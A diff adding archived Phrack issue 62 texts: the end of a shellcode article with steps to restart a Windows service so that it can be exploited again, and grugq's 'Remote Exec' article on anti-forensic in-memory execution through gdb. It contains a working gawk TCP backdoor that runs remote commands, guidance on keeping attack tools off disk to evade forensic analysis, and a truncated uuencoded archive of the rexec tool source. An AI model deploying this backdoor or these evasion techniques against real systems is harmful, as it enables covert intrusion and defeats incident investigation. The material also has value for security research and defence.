+Another example is on the Workstation service bug discovered by Eeye. 
+In this case, we don't have a helper service. But we can kill the 
+relevant service, and restart it.
+
+1. Kill the Workstation service
+#taskkill /fi "SERVICES eq lanmanworkstation" /f
+ 
+2. restart required services
+#net start workstation
+#net start "computer browser"
+#net start "Themes" <== optional
+#net start "messenger"   <== optional
+...
+ 
+If we exit our shellcode now, we can attack the machine via the 
+Workstation exploit again.
+
+
+--[ 8 End of shellcode?
+
+Shellcode is simple to use and probably easiest to illustrate the 
+severity of a vulnerability in proof of concept code. However there 
+are a few more advance payload strategies released to the public by 
+LSD's Windows ASM component, Core Security's Syscall Proxy, Dave 
+Aitel's MOSDEF, etc. These payloads offer much more than a shell. The 
+References section provides a few good pointers to get more 
+information. We hope you enjoy reading our article as much as other 
+quality article from Phrack.
+
+
+--[ 9 Greetz!
+
+There are many good fellows we would like to thank for their 
+continuous source of information to feed our hunger for knowledge. 
+Without these guys, the security field will be boring.
+
+My mentor, my friend: sam, pokleyzz, wanvadder, wyse, socket370 and 
+the rest of =da scan clan=, Ey4s, San and all that support XFocus 
+team! RD and the rest of THC! The Grugq! Saumil! Sheeraj! Nitesh! 
+Caddis from Team-Teso! CK and the rest of SIG^2 team! Sensepost! 
+BrightVaio! L33tdawg and the rest of HackInTheBox team!
+
+Greets to the gurus: HD Moore! Halvar! HSJ! Michal, Adam and the rest 
+of LSD! (David) Mnemonic! Dave Aitel! EEYE! Brett Moore! And many 
+others Blackhat speakers for their excellence research!
+
+
+--[ 10 References
+
+*       Code to this article:
+        http://www.scan-associates.net/papers/one-way.zip
+
+*	Shellcode and exploit:
+	HSJ - http://hsj.shadowpenguin.org/misc/
+
+*	More shellcode!
+	HD Moore - http://www.metasploit.com
+
+*	Advance payload:
+	CORE Security 
+
+*	Syscall Proxying (http://www.blackhat.com/html/bh-usa-
+	02/bh-usa-02-speakers.html#Maximiliano Caceres)
+
+*	Inlineegg 
+	(http://oss.coresecurity.com/projects/inlineegg.html)
+
+*	LSD (http://www.hivercon.com/hc02/talk-lsd.htm)
+
+*	Eeye (http://www.blackhat.com/html/win-usa-03/win-usa-03-
+	speakers.html#Riley Hassel)
+
+*	Dave Aitel (http://www.immunitysec.com/MOSDEF/)
+
+*	Alexander E. Cuttergo (Impurity)
+
+
+--[ 11 The code
+
+Please see http://www.scan-associates.net/papers/one-way.zip
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack62/8.txt b/phrack62/8.txt
new file mode 100644
index 0000000..4fb1671
--- /dev/null
+++ b/phrack62/8.txt
@@ -0,0 +1,1037 @@
+                
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3e, Phile #0x08 of 0x10
+
+|=-----=[ FIST! FIST! FIST! Its all in the wrist: Remote Exec ]=---------=|
+|=-----------------------------------------------------------------------=|
+|=--------------------------=[ by grugq ]=------------------------------=|
+
+
+ 1 - Abtract
+ 2 - Introduction
+ 3 - Principles
+ 4 - Background
+ 5 - Requirements
+ 6 - Design and Implementation
+   6.1 - gdbprpc
+   6.2 - ul_exec
+ 7 - Conclusion
+ 8 - Greets
+ 9 - Bibliography
+10 - SourceC0de
+
+---[ 1 - Abstract
+
+The infrastructue of anti-forensics is built on the three strategies of
+data destruction, data hiding and data contraception. The principles of
+data contracteption, and a technique for executing a data contraception
+attack are presented. This technique provides the ability to execute a
+binary on a remote system without creating a file on the disk.
+
+---[ 2 - Introduction
+
+In the years since the introduction of the first two strategies of
+anti-forensics [grugq 2002], there has been little additional public
+research on anti-forensics. This paper introduces and discusses a third
+core anti-forensics strategy: data contraception. Like the other
+anti-forensic strategies, data destruction and data hiding, data
+contraception seeks to reduce the quantity and quality of forensic
+evidence. Data contraception achieves this by using two core principles:
+preventing data from reaching the disk, and using common utilities, rather
+than custom tools, wherever possible.
+
+The rest of this paper will explore data contraception, looking first at
+the core principles of data contaception, then at the requirements for a
+data contraception tool, and finally the design and implemenation of such a
+tool: rexec (remote exec).
+
+--[ 3 - Principles
+
+Data contraception is the attempt to limit the quantity and quality of
+forensic evidence by keeping forensically valuable, or useful, data off the
+disk. To accomplish this there are two core techniques for interacting with
+the operating system: firstly, operate purely in memory, and secondly use
+common utilities rather than custom crafted tools.
+
+The first principle of data contraception, keeping data off the disk, is
+most important when dealing with files that interact directly with the
+operating system such as binaries, LKMs and scripts. The second principle
+is for guidance when implementing the first principle, and it ensures that
+any data which does touch the disk is of limited value to a forensic
+analyst.
+
+Operating in memory only is not a new technique and its already fairly well
+understood with regards to rootkit development. However, using in memory
+only techniques during a penetration is not as thoroughly documented in the
+literature. Within rootkit technologies, the most frequently encountered
+technique for operating in memory is to use ptrace() to attach to an
+existing process and inject code into it's address space. Additionaly,
+injecting kernel modules directly into the kernel is also a well known
+technique. This paper will focus on developing in memory systems for
+penetration tools.
+
+Implementing an in-memory-only system requires a program on the remote
+target host acting as a server to interact with the operating system. This
+server acts as either an Inter Userland Device (IUD) -- providing access to its
+own address space -- or an Intra Userland Device (IUD) -- providing access to
+another address space. In either case, this IUD is critical to the effective
+execution of a successful data contracteption attack.
+
+The second principle of data contraception is critical in reducing the
+effectiveness of a forensic examination. The use of common utilties means
+that nothing of value exists for an analyst to recover. An example would be
+a back door written using gawk. Since some version 3.x, GNU Awk has
+supported network programming. Why the GNU people added network support to
+a text processing tools is something of a mystery, however it is a useful
+feature for a data contraception attack. Here is a proof of concept
+backdoor developed in a few minutes using gawk.
+
+[------------------------------------------------------------------------]
+        #!/usr/bin/gawk -f
+
+        BEGIN {
+                Port    =       8080
+                Prompt  =       "bkd> "
+
+                Service = "/inet/tcp/" Port "/0/0"
+                while (1) {
+                        do {
+                                printf Prompt |& Service
+                                Service |& getline cmd
+                                if (cmd) {
+                                        while ((cmd |& getline) > 0)
+                                                print $0 |& Service
+                                        close(cmd)
+                                }
+                        } while (cmd != "exit")
+                        close(Service)
+                }
+        }
+[------------------------------------------------------------------------]
+
+To effectively use a script, such as the above, in an attack, the attacker
+would employ the first principle of anti-forensics. In practice, this means
+the attacker would launch the script interpretor and then copy the script
+itself to the interpretor's stdin. This prevents the script from appearing
+on the disk where it might be discovered during a forensic analysis.
+
+Using these two core principles of data contraception, the rest of this
+paper will examine some existing data contraception tools, along with the
+design and implementation of remote exec: rexec.
+
+---[ 4 - Background
+
+There are already several projects which use a data contraception
+methodology, although the terminology for data contraception is more recent
+than their development. The projects that the author is aware of are:
+MOSDEF; Core Impact, and ftrans. The first two projects are commercial
+penetration testing tools, the last is an "anti-honeypot" tool. 
+
+Core Impact implements a data contraception techinque called "syscall
+proxying". Core Impact uses an exploited process as an IUD (Intra), and a
+client which contains the attacker's "business logic". The IUD server
+executes system calls for the client and returns the result. This allows
+the attacker's code to run locally on the client system, and yet behave as
+if it were local to the remote system. According to Dave Aitel, there are
+problems with technique, mostly related to execution speed and complexities
+involving fork().
+
+As a solution to the problems he experienced implementing the Core Impact
+syscall proxying technique, Dave Aitel developed MOSDEF. MOSDEF uses an
+exploited process as an IUD (Intra), and a client which contains a
+compiler. This allows a penetration tester to build an arbitrary program
+on the client and inject it into the address space under the control of the
+IUD for execution. In this technique, the attacker's code runs on the
+remote host, however it exists only in memory. The problems with this
+technique are limitations in the size and complexity of the attacker's
+code, and all of the issues related to implementing a compiler.
+
+Unrelated to the previous two penetration testing programs, ftrans is a
+pure anti-forensics tool designed to operate in the extremely hostile
+forensic environment of a honey pot. The ftrans program uses a custom built
+server which uses SSL to copy a binary from the client into it's own
+address space. It then uses ul_exec() [grugq 2004] to execute the binary
+from a memory buffer. This technique is most similar to what this paper
+will discuss, the design and implementation of rexec.
+
+---[ 5 - Requirements
+
+With data contraception, any action which requires the creation of a file
+is to be avoided. The most common reason for requiring a file is to execute
+a binary. Building a tool which can execute an arbitrary binary on a remote
+host leaves open any number of possible implementations. The requirements
+need to be narrowed down to a manageable set using the principles of data
+contracteption. From those requirements it is then possible to develop a
+design and implementation.
+
+Firstly, the tool has to be able to run over any number of shell
+connections, so the communications protocol between the client and server
+should be ASCII text based. Using ASCII text will mean a slow protocol,
+however robustness and effectiveness, rather than speed, are critical to
+the performance of the tool in the real world.
+
+Secondly, the IUD server has to be a common Unix utility rather than a
+custom crafted tool. That way, the discovery of the server does not
+indicate that the compromised machine has been subjected to a data
+contracteption attack. Using a common utility rather than writing a custom
+tool means that the IUD server will not be intellegent in how it operates.
+Based on the preceeding requirements, its clear that the client has to be
+complex to compensate for the dumb server. This is acceptable because the
+user of a data contraception tool will have complete control over at least
+one machine.
+
+---[ 6 - Design and Implementation
+
+The core design for a data contraception tool to execute binaries on a
+remote system purely from memory is:
+
+        *) use an IUD to gain access to an address space
+        *) upload the binary to execute into memory
+        *) load the binary into an address space
+        *) transfer control of execution to the binary
+
+A library to load ELF binaries from memory into an existing address space
+already exists: ul_exec. Using ul_exec allows the tool to simply upload a
+copy of ul_exec and the binary, then transfer control to ul_exec().
+Therefore, in order to implement the data contraception tool, all that is
+required is a suitable IUD.
+
+A suitable IUD would have to be a common Unix utility which can manipulate
+registers and memory and accepts commands as text. There is one obvious
+solution: gdb. The GNU debugger uses text commands to interact with, and
+operate on, a slave child process.
+
+Using gdb as an IUD allows an attacker to be exploit agnost for
+anti-forensic attacks. After using an arbitrary exploit to gain access to a
+shell, an attacker is able to execute any binary without creating a
+forensic trace. By the same token, once an attacker has shell access to a
+host, he is able to execute an artibtrary command without leaving any
+evidence of forensic value. An IUD seperate from an exploited process
+allows an attacker to use anti-forensic attacks at any point after owning
+a box, rather than only during the initial exploitation phase.
+
+--[ 6.1 - gdbprpc
+
+To interface with gdb, a library was written which creates wrappers for the
+core functions of an IUD. These are memory and register access, and control
+over the execution of various regions of code. This library, gdbrpc,
+creates an arbitrary slave child process for an address space to
+manipulate.
+
+Each gdbrpc session is described by an abstract object: rgp_t. This object
+is created using rgp_init(), which takes a readable and writeable file
+descriptor to a pty based shell. The facilities to execute system calls and
+examine and set memory contents are encapsulated behind standardised
+function calls. For example:
+
+        int rgp_brk(rgp_t *rp, void * end_data_segment);
+        void rgp_set_addr32(rgp_t *rp, void *addr, unsigned int val);
+        unsigned int rgp_get_addr32(rgp_t *rp, void *addr);
+        void rgp_set_reg(rgp_t *rp, rgp_reg reg, unsigned int val);
+
+Copying data into and out of a slave process is accomplished using the
+functions:
+
+        void rgp_copy_to(rgp_t *rp, void *remote, void *local, size_t n);
+        void rgp_copy_from(rgp_t *rp, void *local, void *remote, size_t n);
+
+With the gdbrpc API set, it is trivial to allocate memory in a process,
+copy in arbitrary quantities of code and data, and transfer control of
+execution.
+
+--[ 6.2 - ul_exec
+
+In order for the ul_exec library to be correctly loaded into the address
+space it needs to be relocated to the load address. This is done internally
+within rexec. First, rexec allocates the space for the library in the
+remote address space with rpg_mmap(). The address of that space is then
+used to relocate an internally loaded copy of the ul_exec library, and the
+resultant relocated library is then loaded remotely.
+
+With the ul_exec library loaded in an address space, all that is required
+is creating a memory buffer containing the desired ELF binary. This is
+trivially accomplished using rgp_mmap() and rgp_copy_to().
+
+Finally, putting it all together it is possible to encapsulate the entire
+process into a single call:
+
+        int rx_execve(int fd, char *fname, int argc, char **argv);
+
+--[ 7 - Conclusion
+
+Along with the other two anti-forensic strategies, data destruction and
+data hiding, data contraception helps an attacker reduce the effectiveness
+of a forensic analysis. Data contraception attack techniques have been used
+frequently in the past, although without the articulation of the formalised
+core principlies. These two principles, operating in memory to keep data
+off the disk, and using common utilities rather than incriminating custom
+crafted tools, form the core of the data contraception strategy. A frequent
+component of data contraception attacks is an IUD, which acts as a server
+providing the client access to the operating system without altering the
+file system.
+
+A tool which implements a data contraception attack, remote exec, uses gdb
+as an IUD providing access to a slave process' address space. Accessing rexec
+requires a complex client which can gain access to a pty based shell. A tool
+to encapsulate the rexec protocol has been developed: xsh. The "eXploit
+SHell" is embedded within screen and provides a rich data contraception
+environment for penetration time anti forensic attacks.
+
+--[ 8 - Greets
+
+gera, mammon, grendel PhD, xvr, a_p, _dose, "the old man", apach3, random,
+joey, mikasoft, eugene.
+
+--[ 9 - Bibliography
+
+- grugq 2002 - The Art of Defiling: Defeating Forensic Analysis on Unix
+  http://www.phrack.org/phrack/59/p59-0x06.txt
+
+- grugq 2004 - The Design and Implementation of ul_exec 
+  http://www.hcunix.net/papers/grugq_ul_exec.txt
+
+
+--[ 10 - SourceC0de
+
+begin 600 rexec-0.8.5.tar.gz
+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
